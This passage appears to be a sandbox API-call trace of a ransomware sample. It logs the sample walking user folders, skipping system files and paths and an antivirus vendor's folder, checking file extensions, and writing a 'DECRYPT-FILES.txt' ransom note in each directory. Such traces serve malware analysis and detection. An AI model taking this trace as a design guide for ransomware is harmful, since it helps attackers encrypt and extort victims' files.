(lpString1="Windows Media Player.lnk", lpString2="desktop.ini") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="iconcache.db") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="bootsect.bak") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat.log") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="thumbs.db") returned 1 [0077.856] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Bootfont.bin") returned 1 [0077.856] lstrlenW (lpString="Windows Media Player.lnk") returned 24 [0077.856] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.856] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0077.856] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0077.856] CloseHandle (hObject=0x460) returned 1 [0077.857] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb65d71b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb65d71b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar\\", cAlternateFileName="")) returned 0 [0077.857] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0077.857] CloseHandle (hObject=0x458) returned 1 [0077.857] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0077.857] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.857] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="autorun.inf") returned 1 [0077.857] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="boot.ini") returned 1 [0077.857] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="desktop.ini") returned 1 [0077.857] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ntuser.dat") returned 1 [0077.858] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="iconcache.db") returned 1 [0077.858] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="bootsect.bak") returned 1 [0077.858] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ntuser.dat.log") returned 1 [0077.858] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="thumbs.db") returned 1 [0077.858] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Bootfont.bin") returned 1 [0077.858] lstrlenW (lpString="Window Switcher.lnk") returned 19 [0077.858] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.858] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0077.858] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0077.858] CloseHandle (hObject=0x450) returned 1 [0077.858] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0077.858] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0077.858] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0077.858] lstrcatW (in: lpString1="UserData", lpString2="\\" | out: lpString1="UserData\\") returned="UserData\\" [0077.858] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="UserData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Program Files") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch=":\\Windows") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Games\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\All Users") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="AhnLab") returned 0x0 [0077.858] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0077.859] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.859] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\jkbimi8.tmp") returned 95 [0077.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.860] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0077.860] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.860] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\DECRYPT-FILES.txt") returned 101 [0077.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.860] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0077.861] CloseHandle (hObject=0x454) returned 1 [0077.861] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0077.861] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0077.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0077.862] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.862] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.862] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.862] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.862] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.862] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.862] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.862] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.862] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.862] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.862] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.862] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.862] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.862] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 83 [0077.862] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.862] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0077.863] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\jkbimi8.tmp" [0077.863] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.863] CloseHandle (hObject=0x0) returned 0 [0077.863] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.863] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0077.863] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0077.863] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0077.863] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0077.863] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0077.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Program Files") returned 0x0 [0077.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch=":\\Windows") returned 0x0 [0077.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Games\\") returned 0x0 [0077.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\All Users") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="AhnLab") returned 0x0 [0077.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0077.864] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.864] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\jkbimi8.tmp") returned 99 [0077.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0077.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0077.864] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.864] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\DECRYPT-FILES.txt") returned 105 [0077.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0077.866] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0077.867] CloseHandle (hObject=0x45c) returned 1 [0077.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0077.867] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0077.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0077.867] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.867] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.867] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.867] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.867] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="65UX3YG0", cAlternateFileName="")) returned 1 [0077.867] lstrcmpW (lpString1="65UX3YG0", lpString2=".") returned 1 [0077.867] lstrcmpW (lpString1="65UX3YG0", lpString2="..") returned 1 [0077.867] lstrcatW (in: lpString1="65UX3YG0", lpString2="\\" | out: lpString1="65UX3YG0\\") returned="65UX3YG0\\" [0077.867] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="65UX3YG0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\" [0077.867] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Program Files") returned 0x0 [0077.867] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch=":\\Windows") returned 0x0 [0077.867] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Games\\") returned 0x0 [0077.867] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.867] StrStrW 